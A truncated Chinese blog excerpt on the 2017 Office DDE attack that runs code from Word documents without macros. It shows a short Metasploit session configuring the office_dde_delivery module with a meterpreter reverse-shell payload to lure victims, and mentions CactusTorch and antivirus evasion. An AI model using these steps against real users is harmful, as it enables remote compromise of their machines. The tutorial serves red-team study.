基本介绍
2017年10月SensePost发布了一篇文章并在其中解释了如何在不使用任何宏或脚本的情况下从Microsoft Word文档中执行任意代码,SensePost描述的技术是利用合法的Microsoft Office功能,该功能称为DDE(动态数据交换),DDE旨在允许Microsoft办公应用程序之间传输数据,由于此技术不会使用电子邮件网关可以检测到的恶意宏感染Word文档,因此可以实现与远程代码执行相同的结果,这种攻击非常有效且被广泛用于恶意软件活动和红队评估
利用方式
Metasploit
MSF框架中提供了对DDE漏洞的利用模块,我们可以直接使用该模块生成有效载荷并将其投放给受害者用户诱导其点击运行
msf6 > use exploit/windows/fileformat/office_dde_delivery
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_dde_delivery) > show options
msf6 exploit(windows/fileformat/office_dde_delivery) > set SRVHOST 192.168.204.135
SRVHOST => 192.168.204.135
msf6 exploit(windows/fileformat/office_dde_delivery) > set payload windows/x64/meterpreter/reverse
本文介绍了DDE(动态数据交换)漏洞攻击,一种利用Microsoft Office功能在不使用宏的情况下执行任意代码的方法。通过Metasploit框架和CactusTorch工具,详细阐述了如何生成有效载荷并诱导受害者执行,以实现远程代码执行。尽管DDE攻击在红队评估中有效,但目前防病毒公司正尝试检测此类攻击,因此混淆技术在创建逃避检测的有效载荷中至关重要。
订阅专栏 解锁全文
389

被折叠的 条评论
为什么被折叠?



